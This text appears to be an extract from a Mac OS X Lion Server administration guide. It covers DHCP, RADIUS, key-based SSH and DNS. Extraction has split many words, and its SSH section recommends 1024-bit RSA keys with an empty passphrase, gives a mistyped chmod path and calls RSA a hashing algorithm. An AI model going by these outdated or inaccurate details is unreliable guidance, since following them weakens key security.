You can give more information to computers running Windows on a subnet by adding Windows-s pecific settings to the DHCPsupplied network configuration data. These Windows-specific settings permit Windows clients to browse Network Neighborhood. You mus t know the domain name or IP address of the Windows Internet Naming Service/NetBIOS Name Server (WINS/NBNS)
primary and secondary servers (usually the IP address of the DHCP server), and the NetBIOS over TCP/IP (NBT) node type. The following are pos sible node types : Hybrid (h-node): Checks the WINS s erver and then broadcasts. Peer (p-node): Checks the WINS s erver for name resolution. Broadcast (b-node): Broadcasts for name resolution (most commonly used). Mixed (m-node): Broadcasts for name res olution and then checks the WINS s erver. The NetBIOS Datagram Distribution (NBDD) server works with NBNS to route datagrams to computers on another subnet. The NetBIOS Scope ID isolates NetBIOS communication on a network. The NetBIOS Scope ID is appended to the NetBIOS name of the computer. Computers that have the s ame NetBIOS Scope ID can communicate. NBDD Server and the NetBIOS Scope ID are typically not used, but you might need them depending on your Windows clients configuration and Windows network infrastructure.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets. 5. Select a s ubnet. 6. Click WINS. 7. Enter the domain name or IP addres s of the WINS/NBNS primary and secondary servers for this s ubnet. 8. Enter the domain name or IP addres s of the NBDD s erver for this subnet. 9. From the pop-up menu, choose the NBT node type. 10. Enter the NetBIOS Scope ID. 11. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Use serveradmin to set WINS options for a subnet

Use the same subnetID you used to create the subnet.
subnetID
To set WINS options for a subnet: $ sudo serveradmin settings dhcp:subnets:_array_id:subnetID:WINS_secondary_server = wins-server-2 dhcp:subnets:_array_id:subnetID:WINS_primary_server = wins-server-1 dhcp:subnets:_array_id:subnetID:WINS_NBDD_server = nbdd-server dhcp:subnets:_array_id:subnetID:WINS_node_type = node-type
dhcp:subnets:_array_id:subnetID:WINS_scope_id = scope-ID Control-D For information about serveradmin, see its man page.
DHCP
Manage DHCP
Use DHCP to assign static IP addresses

You can always ass ign the same address to specific computers. This helps simplify configuration when using DHCP and lets you have static servers or services. To keep the same IP address for a computer, you must know the computers Ethernet address (als o known as the MAC or hardware address). Each network interface has its own Ethernet addres s. If a computer is connected to a wired network and a wireless network, it uses a different Ethernet address for each network connection.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Static Maps . 5. Click Add Computer. 6. Enter the name of the computer. 7. In the Network Interfaces lis t, click the column to enter the following information: MAC address of the computer that needs a static addres s IP addres s to as sign to the computer 8. If your computer has other network interfaces that require static IP address es, click the Add button (+) and enter the IP address to ass ign for each interface. 9. Click OK. 10. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Manage DHCP
Use serveradmin to assigning static IP addresses

Static Map Parameter Description A unique ID code for the map entry. The ID must be unique for each static map defined on the server.
mapID
ip_address name en_address
IP address of host. Hosts DNS name. Hosts Ethernet address.
To ass ign a static map: $ sudo serveradmin settings
dhcp:static_maps:_array_id:examplehost/mapID = create dhcp:static_maps:_array_id:examplehost/mapID:ip_address = "1.2.3.4" dhcp:static_maps:_array_id:examplehost/mapID:name = "examplehost" dhcp:static_maps:_array_id:examplehost/mapID:en_address = "00:30:a1:a2:a1:23" Control-D For information about static map IDs, see serveradmin man pages. For information about serveradmin, see its man page.
DHCP
Manage DHCP
Remove or change static address maps

You can change s tatic mappings or remove them as needed.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Static Maps . 5. Select a mapping to Edit or Remove. 6. Click Edit or Remove. If you are editing the mapping, make changes you want, then click OK. 7. Click Save. If DHCP is running, you are prompted to res tart DHCP for changes to take effect. Otherwise, changes take effect the next time you start DHCP.
DHCP
Monitor DHCP
Check DHCP service status

The s tatus overview s hows the following summary of DHCP service: Whether the service is running How many clients it has When the service was started How many IP addresses are s tatically assigned from your s ubnets The las t time the client database was updated
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Overview to view whether the service is running, when it started, the number of s tatic maps, the number of clients connected, and when the last databas e update occurred.
DHCP
Monitor DHCP
Use serveradmin to check DHCP service status

To s ee summary s tatus of DHCP s ervice: $ sudo serveradmin status dhcp To s ee detailed status of the DHCP service: $ sudo serveradmin fullstatus dhcp
For information about serveradmin, see its man page.
DHCP
Monitor DHCP
View DHCP log entries

If youve enabled logging for DHCP service, you can check the s ystem log for DHCP errors. The log view is the system.log file filtered for bootpd. Use the Filter field to search for specific entries.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Log. 5. To s earch for s pecific entries, use the Filter field (upper right corner).
DHCP
Monitor DHCP
Use serveradmin to view DHCP log entries

To view DHCP log entries: $ tail /var/log/system.log For information about tail, see its man page.
DHCP
Monitor DHCP
View the DHCP client list

The DHCP Clients window gives the following information for each client: The IP address served to the client The number of days of lease time left (or the number of hours and minutes, if less than 24 hours) The DHCP client ID (us ually the same as the hardware address) The computer name The hardware addres s
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears .
3. From the expanded Servers list, select DHCP. 4. Click Clients. To s ort the list by different criteria, click a column heading.
DHCP
Monitor DHCP
Configure DHCP to use extra LDAP server URLs

The Server Admin applications DHCP module enables administrators to specify an LDAP server URL for each subnet. To specify multiple LDAP server URLs, edit the /etc/bootpd.plist file or us e the s erveradmin command-line tool (from a Terminal window). Edit the /etc/bootpd.plist file to add multiple LDAP server URLs After you create a subnet using DHCP in Server Admin and specify a single LDAP s erver URL, you can inspect and modify settings by editing the /etc/bootpd.plis t file. 1. Open the /etc/bootpd.plist file in an editor. 2. Locate the tag <string> between the tag <array> of the dhcp_ldap_url key. <key>dhcp_ldap_url</key> <array> <string>ldap://server.example.com/dc=server,dc=example,dc=com</string> </array> 3. Add another LDAP server URL by ins erting a <s tring> tag below the existing <string> tag and entering your LDAP s erver URL between the open <string> and closed </s tring> tags . <key>dhcp_ldap_url</key> <array> <string>ldap://server.example.com/dc=server,dc=example,dc=com</string> <string>ldap://server2.example.com/dc=server2,dc=example,dc=com</string> </array> 4. Save the bootpd.plis t file and exit your editor. 5. If DHCP is running, us e Terminal to restart DHCP service so it can pick up the revised configuration. $ sudo serveradmin stop DHCP $ sudo serveradmin start DHCP Use serveradmin to add multiple LDAP server URLs After you create a subnet using Server Admin DHCP and s pecify an LDAP server URL, you can ins pect and modify s ettings using serveradmin. Do the following. 1. Inspect DHCP subnet settings in Terminal by entering: $ sudo serveradmin settings dhcp:subnets Example result (excerpt) ... dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_ url:_array_index:0 = "lda ... 2. Prepare a file with the serveradmin commands to add a second LDAP Server URL. Becaus e the elements of the dhcp_ldap_url array are not individually access ible, you cannot use the serveradmin create/delete idiom. Example file contents:
dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_ url:_array_index:0 = "lda dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_ url:_array_index:1 = "lda Note: Array indexes start with 0. The old URL entry must be pres ent even though you are adding a second one. The entries must be in order. 3. Use the s erveradmin tool to apply the settings from the file by entering: $ sudo serveradmin settings < filename Example result (the settings are confirmed): dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_ url:_array_index:0 = "lda dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_ url:_array_index:1 = "lda 4. If DHCP is running, restart DHCP s ervice so it can pick up the revised configuration by entering: $ sudo serveradmin stop DHCP $ sudo serveradmin start DHCP
DHCP
Monitor DHCP
DHCP service for Mac OS X clients using DHCP with a manual address
The DHCP s ection of Server Admin permits each s ubnet address range to be enabled or disabled. When the subnet is enabled, the DHCP server allocates addres ses in its range and dis pens es other network information to clients that are configured as Using DHCP. When the subnet is disabled, the DHCP server does not allocate addres ses from the subnet address range pool but it does dispense other network information (s uch as DNS and LDAP server addresses ) to clients that are configured as Using DHCP with manual addres s (static maps), as long as the client addres s is in the subnet range. Enabling and disabling the s ubnet dis ables automatic address allocation for the addres s range but it does not disable DHCP server responses to a client whose address is in the subnet range.
DHCP
Monitor DHCP
Configure DHCP on clients

You can configure clients to us e DHCP to obtain IP address es.
1. Choose Apple > Sys tem Preferences and then click Network. 2. From the Services list, s elect the network connection service for your account (such as Built-in Ethernet) 3. From the Configure pop-up menu, select Using DHCP.
DHCP
Monitor DHCP
Configure a static IP address on a client

You can configure clients to us e static IP addresses.
1. Choose Apple > Sys tem Preferences and then click Network. 2. From the Services list, s elect the network connection service for your account (such as Built-in Ethernet). 3. From the Configure pop-up menu, choose one of the following methods: Manually: enter the IP address, subnet mas k, router, and DNS information in the relevant fields. Using DHCP with manual address : enter the IP address and DNS information in the relevant fields.
If your DHCP s erver is using static mapping, configure client computers to use DHCP. When your client computers connect to your network they will always obtain the s ame IP address . The static mapping us es the MAC address of the client computer to determine the IP address the client gets as signed to.
DHCP
Monitor DHCP
More DHCP information

Request for Comments (RFC) documents provide an overview of a protocol or service and explain how the protocol should behave. If youre a novice s erver administrator, youll probably find the background information in an RFC helpful. If youre an experienced server administrator, you can find technical details about a protocol in its RFC document. You can search for RFC documents by number at www.ietf.org/rfc.html. For details about DHCP, s ee RFC 2131. For more information about advanced configuration options, see the bootpd man page.
RADIUS
About RADIUS
Wireless networking gives companies greater network flexibility, seamlessly connecting laptop users to the network and giving them the freedom to move within the company while staying connected to the network. You use RADIUS to authorize Open Directory users and groups s o they can access AirPort Base Stations on a network. By configuring RADIUS and Open Directory you can control who has access to your wireless network. RADIUS works with Open Directory and Pass word Server to grant authorized us ers access to the network through an AirPort Base Station. When a user attempts to access an AirPort Base Station, AirPort communicates with the RADIUS s erver using Extensible Authentication Protocol (EAP) to authenticate and authorize the user. Users are given access to the network if their user credentials are valid and they are authorized to use the AirPort Bas e Station. If a user is not authorized, he or she cannot access the network through the AirPort Base Station.
RADIUS
Set Up RADIUS
RADIUS setup overview

The following steps outline the tas ks to configure and set up RADIUS service. Turn RADIUS On Before you can configure the service, turn RADIUS on. see Enable RADIUS. Add AirPort Base Stations to a RADIUS server Decide which AirPort Bas e Stations to add to the RADIUS server. See Add AirPort Base Stations to a RADIUS server. Remotely configure an AirPort Base Station Use Server Admin to configure AirPort Base Stations . See Remotely configure AirPort Base Stations . Configure RADIUS to use certificates Use Server Admin to configure RADIUS to use certificates to trust Base Stations . See Configure RADIUS to use certificates. Start RADIUS To start RADIUS, see Start or s top RADIUS.
RADIUS
Set Up RADIUS
Enable RADIUS
Before you can configure RADIUS settings, turn on RADIUS service in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings, then click Services. 3. Select the RADIUS checkbox. 4. Click Save.
RADIUS
Set Up RADIUS
Use the configuration assistant to configure RADIUS

You can us e the RADIUS configuration as sistant to configure RADIUS. The configuration assistant guides you through the RADIUS configuration process and lets you s tart RADIUS.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Overview. 5. Click Configure RADIUS Service. 6. In the RADIUS Server Certificate pane, s elect one of the following: If you select Choose an existing certificate, choos e the certificate from the pop-up menu and click Continue. If you want to create a self-s igned certificate, us e Certificate Ass is tant. For more information, see Server Admin Help. 7. From the Available Base Stations list, select the Base Station you want and click Add. 8. Enter the pas sword of the Base Station in the Base Station Password field, then click Add. To remove a Bas e Station from the Selected Base Stations lis t, select it and click Remove. 9. Click Continue. 10. In the RADIUS Allow Users pane, you can restrict user access : If you select Allow all users , all users access to the Base Stations you select. If you select Restrict to members of group, only users of a group can acces s the Base Stations you select. 11. Click Continue. 12. In the RADIUS setting confirmation pane, verify your s ettings . You can also print or s ave you RADIUS configuration settings. 13. Click Confirm.
RADIUS
Set Up RADIUS
Use radiusconfig to configure RADIUS

You can us e radiusconfig to configure RADIUS.
To view RADIUS settings: $ sudo radiusconfig -appleversion -getconfig -getconfigxml -nascount -naslist -naslistxml -ver - To configure RADIUS parameters: $ sudo radiusconfig -setconfig key value [key value E]
Parameter
Description The name of the key to configure in the radiusd.conf or eap.conf files. The value of the key.
Key value
For information about RADIUS server settings, see RADIUS command-line settings. For information about radiusconfig, see its man page.
RADIUS
Set Up RADIUS
Add AirPort Base Stations to a RADIUS server

You use the Bas e Stations pane of RADIUS in Server Admin to add AirPort Base Stations that will use RADIUS s ervice. You can add up to 64 Base Stations to RADIUS.
1. On the management computer, open Server Admin. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. In the expanded Servers list, click RADIUS. 4. Click Bas e Stations. 5. Below the AirPort Base Stations lis t, click the Add button (+) . 6. Enter the following AirPort Base Station information: Name: Specify the name of the AirPort Base Station. Type: Specify the model of the AirPort Base Station. IP Addres s: Specify the IP address of the AirPort Base Station. Shared Secret and Verify: Specify a s hared secret. The shared s ecret is not a password for authentication, nor does it generate encryption keys to establish secure tunnels between nodes . It is a token that key management systems use to trust each other. You mus t enter the shared secret on the server as well as a client. 7. Click Add.
RADIUS
Set Up RADIUS
Add Bonjour-enabled AirPort Base Stations to a RADIUS server

If your network has AirPort Base Stations that announce themselves using Bonjour, use the Bas e Stations pane of RADIUS in Server Admin to add them to your RADIUS server. You can add up to 64 Base Stations to RADIUS.
1. On the management computer, open Server Admin. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. In the expanded Servers list, click RADIUS. 4. Click Bas e Stations. 5. Below the AirPort Base Stations lis t, click Browse. A lis t of AirPort Bas e Stations found through Bonjour appears. It shows all AirPort Bas e Stations on the server's local subnet and all Wide-Area Bonjour domains known to the s erver. This includes s earch domains lis ted in Network Preferences that have AirPort Base Stations and AirPort Base Stations you added to a MobileMe account as a Back to My Mac (BTMM) enabled server. 6. From the list of AirPort Base Stations , choos e an AirPort Bas e Station to add to your RADIUS server.
7. In the Base station pas sword field, enter the pass word for the AirPort Base Station. 8. Click Add. When the base s tation is added it is configured to us e WPA2 Enterprise for client authentication through TTLS. It also sets a random s hared secret for communication between the Base Station and RADIUS on the server. The shared s ecret is not a password for authentication, nor does it generate encryption keys to establis h secure tunnels between nodes. It is a token that key management systems use to trus t each other.
RADIUS
Set Up RADIUS
Remotely configure AirPort Base Stations

You can remotely configure AirPort Base Stations to use a RADIUS s erver in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Stations list, highlight the AirPort Base Station and then click Edit. If prompted, enter the AirPort administrator password. 6. Click OK.
RADIUS
Set Up RADIUS
Configure RADIUS to use certificates

You can us e Server Admin to configure RADIUS to use custom certificates . Using a certificate increas es the security and manageability of AirPort Base Stations.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Settings 5. From the RADIUS Certificate pop-up menu, choose a certificate. If you dont have a certificate and want to create one, click Manage Certificates. For more information about creating certificates, s ee Server Admin Help. 6. Click Save.
RADIUS
Set Up RADIUS
Use radiusconfig to configure RADIUS certificates

You can us e radiusconfig to import certificates for RADIUS.
To configure RADIUS certificates: $ sudo radiusconfig -installcerts private-key certificate [trusted-ca-list [yes | no [common-name
Parameter
Description T he file path to the clients private key to use in the certificate T he file path to the certificate T he file path to the trusted CA list A request to check a certificate revocation list A request to not check a certificate revocation list T he common name
private-key certificate trusted-ca-list yes no common-name
This command changes eap.conf to contain an active TLS section and configures the certificates. This command also replaces the random file and creates the dh file if absent. For information about radiusconfig, s ee its man page.
RADIUS
Set Up RADIUS
Archive RADIUS service logs

RADIUS service creates entries in the sys tem log for error and alert mes sages. You can archive these log entries.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Settings. 5. Select the Archive radiusd log for the past __ days checkbox and enter the number of days to archive. 6. Click Save.
RADIUS
Set Up RADIUS
Use radiusconfig to archive service logs

You can us e radiusconfig to archive RADUIS service logs.
To configure the rotation of RADIUS service logs: $ sudo radiusconfig -rotatelog [-n file-count] base-file To configure the automatic rotation of RADIUS service logs: $ sudo radiusconfig -autorotatelog [on | off] [-n file-count]
Parameter Description Specifies the number of log files to preserve. Specifies the name of the log file. Enables automatic log rotation. Disables automatic log rotation.
file-count base-file on off
For information about radiusconfig, s ee its man page.
RADIUS
Set Up RADIUS
Start or stop RADIUS

You use Server Admin to start or stop RADIUS. When you stop RADIUS, make s ure no users are connected to AirPort Base Stations your RADIUS s erver manages.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Below the Servers list, click Start RADIUS or Stop RADIUS. The service can take a few seconds to s tart or s top.
RADIUS
Set Up RADIUS
Use radiusconfig to start or stop RADUIS

You can us e radiusconfig to s top or start RADIUS.
To s tart the RADIUS server: $ sudo radiusconfig -start To s top the RADIUS server: $ sudo radiusconfig -stop
RADIUS
Set Up RADIUS
RADIUS command-line settings

To change settings for RADIUS, use the following parameters with the radiusconfig tool.
Command Option Description Displays the version of the tool, including the build version. Displays configuration data stored in the radiusd.conf and eap.conf files in an abbreviated, user-friendly format.
-appleversion -getconfig
-getconfigxml
Displays configuration data stored in the radiusd.conf and eap.conf files in xml plist format.
-nascount -naslist -naslistxml -ver -help
Displays the number of RADIUS clients. Displays the list of RADIUS clients formatted for the clients.conf file. Displays the list of RADIUS clients in xml plist format. Displays a specific build version. Displays usage information.
-q
Suppresses prompts.
RADIUS
Set Up RADIUS
Enable or diable transport level security (TLS)

You can enable or dis able Trans port Level Security (TLS) by modifying the TLS section of the eap.conf file.
To enable TLS: $ sudo radiusconfig -enable-tls To dis able TLS: $ sudo radiusconfig -disable-tls
RADIUS
Manage RADIUS
Check RADIUS Status

You can us e Server Admin to check the status of RADIUS.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Overview to s ee whether the service is running, the number of client base stations , and when it was s tarted.
RADIUS
Manage RADIUS
View RADIUS logs

RADIUS creates entries in the system log for error and alert messages. You can filter the log to narrow the number of viewable log entries and make it eas ier to find an entry.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Logs. 5. Choose a log to view (radiusconfig or radiusd).
RADIUS
Manage RADIUS
Edit RADIUS access

You can restrict acces s to RADIUS by creating a group of us ers and adding them to the s ervice acces s control list (SACL) of RADIUS.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server.
The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Settings, then click Edit Allowed Users . 5. Select For selected services below, then s elect RADIUS. 6. Click Services. 7. Select Allow only us ers and groups below. 8. Click the Add button (+). 9. From the Users & Groups window, drag users or groups to the Allow only users and groups below list. If you dont see a recently created user, click the Refresh button (below the Servers lis t). If you want to remove us ers from the Allow only users and groups below lis t, select the us ers or us er groups and click the Delete button (). Only users in the list can us e RADIUS service.
RADIUS
Manage RADIUS
Delete AirPort Base Stations

You can us e Server Admin to delete AirPort Base Stations from the RADIUS server. When you delete AirPort Base Stations, make s ure the s tations are dis connected from the network. Otherwis e, unauthorized users might access your network.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Station list, highlight a Bas e Station and click Remove. 6. Verify you want to remove the Base Station by clicking Remove again.
RADIUS
Manage RADIUS
Edit an AirPort Base Station record

You can us e Server Admin to edit an AirPort Base Station record on your RADIUS server.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Station list, highlight the Bas e Station to modify and click the Edit button. 6. Modify the Base Station information and click Save.
RADIUS
Manage RADIUS
Save an AirPort Base Station Internet connect file

You can us e Server Admin to s ave an AirPort Bas e Station internet connect file.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Station list, highlight the bas e station. 6. Click Save Internet Connect File. 7. In the Save As field, enter the name. 8. From the Where pop-up menu, choose the location to save the file. 9. In the Wireless Network Name (SSID) field, enter the wireless network name. 10. Click Save.
RADIUS
Manage RADIUS
Use radiusconfig to manage RADIUS clients

Use the radius config tool to add, import, remove, and configure RADIUS clients.
To add RADIUS clients: $ sudo radiusconfig -addclient nas-name shortname [type] To import RADIUS clients: $ sudo radiusconfig -importclients xml-plist-file To remove RADIUS clients: $ sudo radiusconfig -removeclient nas-name [nas-name ...] To assign an access control group to a client of the RADIUS s ervice: $ sudo radiusconfig -setgroup nas-namegroup-name
Parameter
Description The name of the client The shortname of the client (Optional) T he type of the client The name of the file, including the path, to import clients from The name of the access control group
nas-name shortname type xml-plist-file group-name
SSH key authentication
Key-Based SSH login

SSH is a network protocol that establishes a secure channel between your computer and a remote computer. It uses public-key cryptography to authenticate the remote computer. It also provides traffic encryption and data integrity exchanged between computers . Key-based authentication is helpful for s uch tas ks as automating file transfers and backups and for creating failover scripts becaus e it allows computers to communicate without a user needing to enter a pass word. Important: Key-based authentication has risks. If the private key you generate becomes compromis ed, unauthorized users can access your computers . You must determine whether the advantages of key-based authentication are worth the risks. SSH is frequently used to log in to a remote machine to execute commands, but you can also use it to create a s ecure data tunnel, forwarding through an arbitrary TCP port. You can also use SSH to transfer files using SFTP and SCP. By default, an SSH server uses the standard TCP port 22. Lion Server us es OpenSSH as the basis for its SSH tools. Notably, portable home directory synchronization and Open Directory replication are provided via SSH.
Generate a key pair for SSH authentication

This is the proces s of s etting up key-based SSH login authentication on Lion Server. To set up key-based SSH, you must generate the keys the two computers will use to establish and validate the identity of each other. This doesnt authorize all users of the computer to have SSH access . Keys must be generated for each user account. To do this, you must run the following commands in Terminal. The process must be repeated for each user that needs to open key-based SSH ses sions . Important: Key-based authentication has risks. If the private key you generate becomes compromis ed, unauthorized users can access your computers . You must determine whether the advantages of key-based authentication are worth the risks.
1. Verify that an .s sh folder exists in your home folder by entering the command: ls -ld ~/.ssh If .ssh is listed in the output, move to step 2. If .ssh is not listed in the output, run mkdir -m 700 ~/.ssh and continue to step 2. 2. Change directories in the shell to the hidden .ssh directory by entering the following command: cd ~/.ssh 3. Generate the public and private keys by entering the following command: ssh-keygen -b 1024 -t rsa -f id_rsa -P '' The -b flag sets the length of the keys to 1,024-bits, -t indicates to use the RSA hashing algorithm, -f sets the file name as id_rsa, and -P followed by two single-quote marks sets the private key pas sword to be null. The null private key password allows for automated SSH connections. Keys are equivilant to pas swords , so keep them private and protected. 4. Copy the public key into the authorized key file by entering the following command: cat id_rsa.pub >> authorized_keys2 5. Set the permissions on the private key s o the file can only be changed by the owner: chmod go-rwx ~/.ssh/.id_rsa 6. Copy the public key and the authorized key lists to the specified users home folder on the remote computer by entering the following command: scp authorized_keys2 username@remotemachine:~/.ssh/ To establish two-way communication between servers , repeat this process on the second computer.
Key-Based SSH with scripting sample

A cluster of s ervers is an ideal environment for using key-based SSH.
The following Perl s cript is a trivial scripting example that should not be implemented, but it demonstrates connecting over an SSH tunnel to servers defined in the variable serverList, running softwareupdate, installing available updates, and restarting the computer if neces sary. The s cript as sumes that key-based SSH was s et up for an admin user on all servers to be updated. #!/usr/bin/perl # \@ is the escape sequence for the "@" symbol. my @serverList = ('admin\@exampleserver1.example.com', 'admin\@exampleserver2.example.com'); foreach $server (@serverList) { open SBUFF, "ssh $server -x -o batchmode=yes 'softwareupdate -i -a' |"; while(<SBUFF>) { my $flag = 0; chop($_); #check for restart text in $_ my $match = "Please restart immediately"; $count = @{[$_ =~ /$match/g]}; if($count > 0) { $flag = 1; } } close SBUFF; if($flag == 1) { "ssh $server -x -o batchmode=yes shutdown -r now" } }
DNS
About DNS service

When us ers want to connect to a network res ource s uch as a web or file s erver, they typically request it by domain name (such as www.example.com) rather than by IP address (such as 192.168.12.12). The Domain Name Sys tem (DNS) is a distributed database that maps IP addresses to domain names so users can find the resources by name rather than numerical address. A DNS server keeps a list of domain names and the IP addresses ass ociated with each name. When a computer needs to find the IP address for a name, it sends a mess age to the DNS server, which is also known as a name server. The name server looks up the IP address and sends it back to the computer. If the name s erver does nt have the IP address locally, it sends mess ages to other name s ervers on the Internet until the IP addres s is found. Setting up and maintaining a DNS s erver is a complex process . Therefore, many administrators rely on their Internet Service Provider (ISP) for DNS service. In this case, you only need to configure your network preferences with the IP address of the name server, which is provided by your ISP. If you dont have an ISP to handle DNS requests for your network and any of the following are true, you mus t set up your own DNS service: You cant use DNS from your ISP or other source. You plan on making frequent changes to the name s pace and want to maintain it yours elf. You have a mail server on your network and you have difficulties coordinating with the ISP that maintains your domain. You have s ecurity concerns because your networks computer names and address es are access ible to an outs ide organization (your ISP). Lion Server us es Berkeley Internet Name Domain (BIND) v9.4.1 for its implementation of DNS protocols. BIND is an open-source implementation and is used by mos t name s ervers on the Internet.
DNS
DNS zones
Zones are the bas ic organizational unit of DNS. Zones contain records and are defined by how they acquire thos e records and how they respond to DNS requests. There are three bas ic zones: Primary Secondary Forward Other kinds of zones are not covered here. Primary zones A primary zone has the master copy of the zones records and provides authoritative answers to lookup requests. Secondary zones A secondary zone is a copy of a primary zone and is stored on a s econdary name server. It has the following characteristics: Each secondary zone has a lis t of primary s ervers that it contacts for updates to records in the primary zone. Secondaries must be configured to request the copy of the primary zone data. Secondary zones use zone trans fers to get copies of the primary zone data. Secondary name servers can take lookup requests like primary s ervers. By us ing several s econdary zones linked to one primary, you can distribute DNS query loads across several computers and make sure lookup requests are answered if the primary name s erver is down. Secondary zones also have a refresh interval. This interval determines how often the secondary zone checks for changes from the primary zone. You can change the zone refresh interval by using the BIND configuration file. For more information, see www.is c.org/sw/bind. Forward Zones A forward zone directs lookup requests for that zone to other DNS s ervers. Forward zones dont zone transfers. Often, forward zone servers are us ed to provide DNS s ervice to a private network behind a firewall. In this case, the DNS server must have access to the Internet and a DNS server outs ide the firewall. Forward zones also cache responses to queries they pas s on. This can improve the performance of lookups by clients that use the forward zone. Server Admin does not support creation or modification of a forward zone. To create a forward zone, you mus t configure BIND manually at the command line. For details, see the BIND documentation.
DNS
DNS machine records

Each zone contains a number of records. Thes e records are requested when a computer translates a domain name (like www.example.com) to an IP number. Web brows ers , mail clients , and other network applications rely on zone records to contact the correct server. Primary zone records are queried by others across the Internet so they can connect to your network services. Several types of DNS records are available for configuration by Server Admin:
DNS record Address (A) Canonical Name (CNAME) Description Stores the IP address associated with a domain name. Stores an alias in connection with the real name of a server. For example, mail.apple.com might be an alias for a computer with a real
canonical name of MailSrv473.apple.com. Mail Exchanger (MX) Name Server (NS) Pointer (PTR) Text (TXT) Service (SRV) Hardware Info (HINFO) Stores the domain name of the computer used for mail in a zone. Stores the authoritative name server for a zone. Stores the domain name of an IP address (reverse lookup). Stores a text string as a response to a DNS query. Stores information about the services a computer provides. Stores information about a computers hardware and software.
Lion Server simplifies the creation of thes e records by focusing on the computer being added to the zone, rather than the records. When you add a computer record to a zone, Lion Server creates the zone records that resolve to a computer address. With this model, you can focus on what your computers do in your domain, rather than which record types apply to its functions. If you need access to other kinds of records , you must edit the BIND configuration files manually. For details, s ee www.is c.org/sw/bind.
DNS
Bonjour and link-local addressing

With Bonjour, you can s hare nearly anything, including files, media, printers, and other devices, in innovative and easier ways. It simplifies traditional network-based activities like file sharing and printing by providing dynamic discoverability of file s ervers and Bonjour-enabled network printers. Bonjour begins by s implifying the otherwise complex process of configuring devices for a network. To communicate with other devices us ing IP, a device needs special information like an IP addres s, a s ubnet mas k, DNS address es, a DNS name, and preconfigured search paths. Unders tanding thes e cryptic details and performing the subsequent configuration can be daunting for the average us er. When a new computer or device is added to a network by means of autoconfiguration, like a DHCP server, Bonjour configures the device using a technique called link-local addres sing. (If a DHCP s erver is available, Bonjour uses the ass igned IP address.) With link-local addres sing, the computer randomly s elects an IP address from a defined range of addres ses set as ide by the Internet Assigned Numbers Authority (IANA) for link-local address ing and as signs that address to itself. Addresses are in the range 169.254.xxx.xxx. The device then sends a mess age over the network to determine whether another device is using the address. If the address is in use, the device randomly selects addresses until it finds one that is available. When the device has assigned itself an IP address, it can send and receive IP traffic on the network. Mac OS X Server v10.5 or later supports Wide-Area Bonjour browsing that allows computers and devices that support Bonjour to communicate acros s LANs , subnets, and the Internet.
DNS
Before you set up DNS service

Because the iss ues involved with DNS administration are complex and numerous, do not set up DNS service on your network unles s youre an experienced DNS administrator. A good source of information about DNS is DNS and BIND, 5th edition, by Paul Albitz and Cricket Liu (OReilly and Associates, 2006). Note: Apple can help you locate a network consultant to implement DNS s ervice. You can contact Apple Profes sional Services and Apple Consultants Network on the web at cons ultants.apple.com. Cons ider creating a mail alias, s uch as hostmaster, that receives mail and delivers it to the pers on that runs the DNS server at your site. This permits us ers and other DNS administrators to contact you regarding DNS problems . Set up at least one primary and one secondary name server. That way, if the primary name s erver shuts down, the s econdary name server can continue to provide s ervice. A secondary server gets its information from the primary s erver by periodically copying all domain information from the primary server.
